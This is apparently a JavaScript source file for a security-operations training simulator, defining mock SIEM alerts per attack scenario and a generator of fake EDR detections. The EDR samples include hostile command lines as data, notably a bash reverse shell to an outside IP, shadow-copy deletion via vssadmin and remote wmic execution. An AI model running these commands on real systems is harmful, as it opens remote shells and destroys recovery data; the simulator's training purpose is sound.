    { id: "a1", title: "Unknown Process from AppData", sev: "high", src: "DESKTOP-WIN01", tactic: "Persistence", rule: "SIGMA: Executable in AppData running" },
    { id: "a2", title: "Persistent C2 Beacon", sev: "high", src: "DESKTOP-WIN01", tactic: "Command and Control", rule: "NET: Regular interval outbound beacon" },
  ],
  dns_anomaly: [
    { id: "a1", title: "DGA / DNS Tunneling Detected", sev: "high", src: "DESKTOP-WIN01", tactic: "Command and Control", rule: "SIGMA: High entropy DNS queries" },
    { id: "a2", title: "DNS Query Volume Spike", sev: "medium", src: "dns-srv", tactic: "Command and Control", rule: "THRESHOLD: DNS queries 4000% above baseline" },
  ],
  privileged_misuse: [
    { id: "a1", title: "Admin Account After-Hours Access", sev: "medium", src: "dc-01", tactic: "Collection", rule: "UBA: Privileged account outside hours" },
    { id: "a2", title: "Unusual File Share Access", sev: "high", src: "SERVER-WIN01", tactic: "Collection", rule: "UBA: First-time access to Finance share" },
  ],
  rdp_external: [
    { id: "a1", title: "RDP Exposed to Internet", sev: "high", src: "fw-01", tactic: "Initial Access", rule: "CSPM: RDP open to 0.0.0.0/0" },
    { id: "a2", title: "RDP Brute Force Detected", sev: "high", src: "SERVER-WIN01", tactic: "Credential Access", rule: "SIGMA: >100 RDP failures from single IP" },
    { id: "a3", title: "Successful RDP from External IP", sev: "critical", src: "SERVER-WIN01", tactic: "Initial Access", rule: "AUTH: RDP success from unknown external IP" },
  ],
  crypto_miner: [
    { id: "a1", title: "Cryptominer Process Detected", sev: "high", src: "LINUX-APP01", tactic: "Impact", rule: "SIGMA: Known miner binary (xmrig)" },
    { id: "a2", title: "Mining Pool Connection", sev: "high", src: "LINUX-APP01", tactic: "Impact", rule: "TI: Connection to mining pool domain" },
  ],
  fake_helpdesk: [
    { id: "a1", title: "Unauthorized Remote Access Tool", sev: "high", src: "DESKTOP-WIN02", tactic: "Initial Access", rule: "SIGMA: AnyDesk installed and launched" },
    { id: "a2", title: "Remote Session from Unknown Operator", sev: "critical", src: "DESKTOP-WIN02", tactic: "Initial Access", rule: "UBA: Remote control by external party" },
  ],
  data_on_pastebin: [
    { id: "a1", title: "Corporate Data on Public Paste Site", sev: "high", src: "ti-feed", tactic: "Exfiltration", rule: "TI: Employee PII found on Pastebin" },
    { id: "a2", title: "Active Accounts in Leaked Data", sev: "high", src: "dc-01", tactic: "Initial Access", rule: "UBA: 23 accounts matched in leak" },
  ],
  shadow_it: [
    { id: "a1", title: "Unsanctioned Cloud App Usage", sev: "medium", src: "proxy", tactic: "Exfiltration", rule: "DLP: Data upload to unapproved service" },
    { id: "a2", title: "Sensitive File Uploaded Externally", sev: "high", src: "dlp-engine", tactic: "Exfiltration", rule: "DLP: Confidential document in cloud upload" },
  ],
  ransomware_note_found: [
    { id: "a1", title: "Ransom Note Discovered on File Share", sev: "critical", src: "SERVER-WIN01", tactic: "Impact", rule: "SIGMA: Known ransom note filename pattern" },
    { id: "a2", title: "Suspicious PowerShell Activity", sev: "high", src: "DESKTOP-WIN01", tactic: "Execution", rule: "SIGMA: Encoded PS command prior to note" },
    { id: "a3", title: "Known Ransomware C2 Blocked", sev: "high", src: "fw-01", tactic: "Command and Control", rule: "TI: Ransomware staging IP contacted" },
  ],
  supply_chain_attack: [
    { id: "a1", title: "Backdoored Vendor Update Detected", sev: "critical", src: "DESKTOP-WIN01", tactic: "Initial Access", rule: "TI: Malicious DLL in trusted vendor package" },
    { id: "a2", title: "C2 Beacon to IOC Domain", sev: "critical", src: "Multiple", tactic: "Command and Control", rule: "TI: New domain in supply chain IOC list" },
    { id: "a3", title: "Credential Access via Backdoor", sev: "critical", src: "DC-PRIMARY", tactic: "Credential Access", rule: "SIGMA: LSASS read by vendor process" },
    { id: "a4", title: "Large Outbound Data Transfer", sev: "high", src: "LINUX-APP01", tactic: "Exfiltration", rule: "DLP: >1GB to unknown external IP" },
  ],
  zero_day_exploit: [
    { id: "a1", title: "Memory Corruption in Web App", sev: "critical", src: "LINUX-WEB01", tactic: "Initial Access", rule: "WAF: Heap spray / memory corruption" },
    { id: "a2", title: "Kernel Privilege Escalation", sev: "critical", src: "LINUX-WEB01", tactic: "Privilege Escalation", rule: "SIGMA: Unusual syscall sequence" },
    { id: "a3", title: "Unknown Implant Dropped to Disk", sev: "high", src: "LINUX-WEB01", tactic: "Persistence", rule: "EDR: Zero-detection ELF binary" },
    { id: "a4", title: "C2 Heartbeat from Web Server", sev: "high", src: "LINUX-WEB01", tactic: "Command and Control", rule: "NET: Interval beacon from DMZ host" },
  ],
  active_directory_attack: [
    { id: "a1", title: "DCSync Attack Detected", sev: "critical", src: "DESKTOP-WIN01", tactic: "Credential Access", rule: "SIGMA: Replication from non-DC" },
    { id: "a2", title: "Golden Ticket Forged", sev: "critical", src: "DESKTOP-WIN01", tactic: "Credential Access", rule: "SIGMA: Mimikatz kerberos::golden" },
    { id: "a3", title: "Anomalous Kerberos TGT Lifetime", sev: "critical", src: "DC-PRIMARY", tactic: "Lateral Movement", rule: "AUTH: TGT lifetime >24h" },
    { id: "a4", title: "Unauthorized Domain Admin Created", sev: "critical", src: "DC-PRIMARY", tactic: "Persistence", rule: "SIGMA: User added to Domain Admins" },
    { id: "a5", title: "NTDS.dit Copied Offline", sev: "critical", src: "DC-PRIMARY", tactic: "Credential Access", rule: "SIGMA: NTDSUtil shadow copy" },
  ],
  ot_ics_intrusion: [
    { id: "a1", title: "IT-to-OT Firewall Bypass", sev: "critical", src: "fw-01", tactic: "Initial Access", rule: "FW: Unauthorized IT→OT RDP session" },
    { id: "a2", title: "SCADA HMI Unauthorized Access", sev: "critical", src: "192.168.100.5", tactic: "Initial Access", rule: "OT: Non-OT account on HMI workstation" },
    { id: "a3", title: "PLC Setpoint Modified", sev: "critical", src: "192.168.100.10", tactic: "Impair Process Control", rule: "OT: Modbus write to PLC controller" },
    { id: "a4", title: "Safety System Config Altered", sev: "critical", src: "192.168.100.5", tactic: "Inhibit Response Function", rule: "OT: Emergency shutdown threshold changed" },
  ],
  multi_stage_apt: [
    { id: "a1", title: "Spear-Phishing Initial Access", sev: "high", src: "mail-gw", tactic: "Initial Access", rule: "DLP: Targeted spear-phish to exec assistant" },
    { id: "a2", title: "Long-Running C2 Channel", sev: "critical", src: "DESKTOP-WIN01", tactic: "Command and Control", rule: "NET: Jitter beacon active 90+ days" },
    { id: "a3", title: "Domain Credential Harvesting", sev: "critical", src: "DC-PRIMARY", tactic: "Credential Access", rule: "SIGMA: Kerberoasting — multiple SPNs" },
    { id: "a4", title: "Slow Exfiltration Detected", sev: "critical", src: "fw-01", tactic: "Exfiltration", rule: "DLP: 200MB/day sustained outbound 90 days" },
    { id: "a5", title: "Cobalt Strike Beacon in Memory", sev: "critical", src: "LINUX-APP01", tactic: "Command and Control", rule: "EDR: CS beacon artifact in process memory" },
  ],
  container_escape: [
    { id: "a1", title: "Container Escape Detected", sev: "critical", src: "LINUX-APP01", tactic: "Privilege Escalation", rule: "SIGMA: nsenter to host namespace" },
    { id: "a2", title: "Kubernetes Secret Exfiltration", sev: "critical", src: "LINUX-APP01", tactic: "Credential Access", rule: "K8s: Service account token read" },
    { id: "a3", title: "Privileged Pod Created", sev: "critical", src: "LINUX-APP01", tactic: "Persistence", rule: "K8s: hostPath mount privileged pod" },
    { id: "a4", title: "Cryptominer DaemonSet Deployed", sev: "high", src: "Multiple", tactic: "Impact", rule: "K8s: Unknown DaemonSet across all nodes" },
  ],
  business_email_compromise: [
    { id: "a1", title: "Lookalike Domain Email Detected", sev: "high", src: "mail-gw", tactic: "Initial Access", rule: "DLP: Domain typosquatting pattern" },
    { id: "a2", title: "Unauthorized CFO Mailbox Access", sev: "critical", src: "auth-svc", tactic: "Collection", rule: "UBA: Exec mailbox from foreign IP" },
    { id: "a3", title: "BEC Mail Forwarding Rule", sev: "critical", src: "mail-gw", tactic: "Collection", rule: "SIGMA: Inbox rule forward+delete externally" },
    { id: "a4", title: "Wire Transfer Fraud Indicators", sev: "critical", src: "ti-feed", tactic: "Exfiltration", rule: "TI: Receiving account in fraud database" },
  ],
  ransomware_double_extortion: [
    { id: "a1", title: "Pre-Encryption Data Exfiltration", sev: "critical", src: "LINUX-APP01", tactic: "Exfiltration", rule: "DLP: 200GB staged and uploaded" },
    { id: "a2", title: "BLACKCAT Ransomware Detected", sev: "critical", src: "Multiple", tactic: "Impact", rule: "AV: ALPHV/BLACKCAT ransomware family" },
    { id: "a3", title: "Leak Site Confirmation", sev: "critical", src: "ti-feed", tactic: "Impact", rule: "TI: Corporate data posted to dark web" },
    { id: "a4", title: "Backup Repository Targeted", sev: "critical", src: "SERVER-WIN01", tactic: "Impact", rule: "SIGMA: Ransomware targeting backup server" },
    { id: "a5", title: "VSS Snapshots Deleted", sev: "high", src: "Multiple", tactic: "Defense Evasion", rule: "SIGMA: vssadmin delete shadows" },
  ],
  credential_stuffing: [
    { id: "a1", title: "Distributed Login Spike Detected", sev: "high", src: "fw-01", tactic: "Credential Access", rule: "THRESHOLD: 45k logins from 380 IPs/10min" },
    { id: "a2", title: "Credential Stuffing Pattern", sev: "high", src: "auth-svc", tactic: "Credential Access", rule: "UBA: Low per-IP rate, high total volume" },
    { id: "a3", title: "847 Accounts Compromised", sev: "critical", src: "auth-svc", tactic: "Initial Access", rule: "AUTH: Mass successful stuffed logins" },
    { id: "a4", title: "Customer PII Access Post-Takeover", sev: "critical", src: "LINUX-APP01", tactic: "Collection", rule: "DLP: Bulk PII access via compromised accounts" },
  ],
  man_in_the_middle: [
    { id: "a1", title: "ARP Spoofing Detected", sev: "critical", src: "10.0.1.50", tactic: "Collection", rule: "NET: Duplicate MAC for gateway IP" },
    { id: "a2", title: "MITM Traffic Interception Active", sev: "critical", src: "wlan-sensor", tactic: "Collection", rule: "NET: Traffic rerouted through unknown host" },
    { id: "a3", title: "Credential Interception Suspected", sev: "critical", src: "auth-svc", tactic: "Credential Access", rule: "DLP: Cleartext auth in intercepted stream" },
    { id: "a4", title: "NTLM Relay Attack", sev: "critical", src: "DC-PRIMARY", tactic: "Lateral Movement", rule: "SIGMA: NTLM relay to domain controller" },
  ],
  fileless_malware: [
    { id: "a1", title: "Fileless Payload in Memory", sev: "critical", src: "DESKTOP-WIN01", tactic: "Execution", rule: "EDR: In-memory execution, no disk artifact" },
    { id: "a2", title: "WMI Persistence Subscription", sev: "high", src: "DESKTOP-WIN01", tactic: "Persistence", rule: "SIGMA: WMI ActiveScript event consumer" },
    { id: "a3", title: "Process Hollowing Detected", sev: "critical", src: "DESKTOP-WIN01", tactic: "Defense Evasion", rule: "EDR: svchost.exe with injected memory" },
    { id: "a4", title: "Fileless LSASS Credential Dump", sev: "critical", src: "DC-PRIMARY", tactic: "Credential Access", rule: "SIGMA: comsvcs.dll MiniDump technique" },
  ],
  kerberoasting: [
    { id: "a1", title: "Abnormal TGS Request Volume", sev: "high", src: "DC-PRIMARY", tactic: "Credential Access", rule: "SIGMA: >20 TGS requests/min single user" },
    { id: "a2", title: "SPN Enumeration Detected", sev: "high", src: "DESKTOP-WIN01", tactic: "Discovery", rule: "SIGMA: SetSPN domain enumeration" },
    { id: "a3", title: "Rubeus Kerberoasting Tool", sev: "critical", src: "DESKTOP-WIN01", tactic: "Credential Access", rule: "EDR: Rubeus.exe pattern in memory" },
    { id: "a4", title: "Cracked Service Account Login", sev: "critical", src: "auth-svc", tactic: "Initial Access", rule: "AUTH: svc-sql login from external IP" },
  ],
  siem_evasion: [
    { id: "a1", title: "SIEM Agent Stopped on Endpoints", sev: "critical", src: "Multiple", tactic: "Defense Evasion", rule: "SIGMA: Security agent service disabled" },
    { id: "a2", title: "Windows Event Logs Cleared", sev: "critical", src: "SERVER-WIN01", tactic: "Defense Evasion", rule: "SIGMA: EventLog cleared — Security/System" },
    { id: "a3", title: "Audit Policy Disabled on DC", sev: "critical", src: "DC-PRIMARY", tactic: "Defense Evasion", rule: "SIGMA: auditpol.exe /clear executed" },
    { id: "a4", title: "Firewall Syslog Disrupted", sev: "high", src: "fw-01", tactic: "Defense Evasion", rule: "NET: SIEM syslog stream interrupted" },
  ],
  wiper_malware: [
    { id: "a1", title: "MBR Overwrite Detected", sev: "critical", src: "Multiple", tactic: "Impact", rule: "EDR: Disk sector 0 write by non-OS process" },
    { id: "a2", title: "Mass File Deletion in Progress", sev: "critical", src: "SERVER-WIN01", tactic: "Impact", rule: "SIGMA: Recursive deletion of C:\\ and shares" },
    { id: "a3", title: "Linux Disk Zeroing Active", sev: "critical", src: "LINUX-APP01", tactic: "Impact", rule: "SIGMA: dd if=/dev/zero to block device" },
    { id: "a4", title: "Backup Server Targeted", sev: "critical", src: "SERVER-WIN01", tactic: "Impact", rule: "SIGMA: Wiper spreading to backup repo" },
    { id: "a5", title: "AD Database Deletion Attempt", sev: "critical", src: "DC-PRIMARY", tactic: "Impact", rule: "SIGMA: NTDS.dit deletion command" },
  ],
  oauth_token_theft: [
    { id: "a1", title: "Browser Token Store Accessed", sev: "high", src: "DESKTOP-WIN01", tactic: "Credential Access", rule: "EDR: Chrome token DB read by external process" },
    { id: "a2", title: "OAuth Token Replay Attack", sev: "critical", src: "auth-svc", tactic: "Initial Access", rule: "AUTH: Refresh token used from unknown IP" },
    { id: "a3", title: "MFA Bypassed via Token Reuse", sev: "critical", src: "auth-svc", tactic: "Defense Evasion", rule: "AUTH: No MFA challenge on API token auth" },
    { id: "a4", title: "Malicious OAuth App Registered", sev: "critical", src: "auth-svc", tactic: "Persistence", rule: "CSPM: New OAuth app with Mail+Files scope" },
    { id: "a5", title: "Email Auto-Forward via OAuth App", sev: "high", src: "mail-gw", tactic: "Collection", rule: "SIGMA: App-based email forwarding rule" },
  ],
};

export function generateAlerts(scenarioId) {
  const templates = ALERT_TEMPLATES[scenarioId] || ALERT_TEMPLATES["phishing_compromise"];
  return templates.map(t => ({ ...t, status: "open", timestamp: new Date().toISOString() }));
}

// ─── EDR Detection Generator ──────────────────────────────────────────────────

export function generateEDRDetections(scenarioId) {
  const base = [
    { id: "edr1", endpoint: "DESKTOP-WIN01", process: "powershell.exe", pid: 4892, parent: "cmd.exe", cmdline: "powershell.exe -enc JABjAD0ATgBlAHcALQBPAGIAagBlAGMA...", severity: "high", mitre: "T1059.001", time: new Date(Date.now() - 38 * 60000).toISOString() },
    { id: "edr2", endpoint: "DESKTOP-WIN01", process: "cmd.exe", pid: 3201, parent: "explorer.exe", cmdline: "cmd.exe /c vssadmin delete shadows /all /quiet", severity: "critical", mitre: "T1490", time: new Date(Date.now() - 28 * 60000).toISOString() },
    { id: "edr3", endpoint: "SERVER-WIN01", process: "svchost32.exe", pid: 8812, parent: "WmiPrvSE.exe", cmdline: "C:\\Windows\\Temp\\svchost32.exe -s", severity: "critical", mitre: "T1036", time: new Date(Date.now() - 25 * 60000).toISOString() },
    { id: "edr4", endpoint: "DESKTOP-WIN02", process: "wmic.exe", pid: 2244, parent: "powershell.exe", cmdline: "wmic.exe /node:10.0.1.11 process call create cmd.exe /c whoami", severity: "high", mitre: "T1047", time: new Date(Date.now() - 15 * 60000).toISOString() },
  ];

  if (scenarioId === "lateral_movement") {
    base.push({ id: "edr5", endpoint: "DC-PRIMARY", process: "lsass.exe", pid: 600, parent: "wininit.exe", cmdline: "C:\\Windows\\system32\\lsass.exe (memory read by procdump.exe)", severity: "critical", mitre: "T1003.001", time: new Date(Date.now() - 55 * 60000).toISOString() });
  }
  if (scenarioId === "web_compromise") {
    base.push({ id: "edr5", endpoint: "LINUX-WEB01", process: "bash", pid: 1337, parent: "apache2", cmdline: "bash -i >& /dev/tcp/91.92.247.18/4444 0>&1", severity: "critical", mitre: "T1059.004", time: new Date(Date.now() - 60 * 60000).toISOString() });
  }

  return base;
}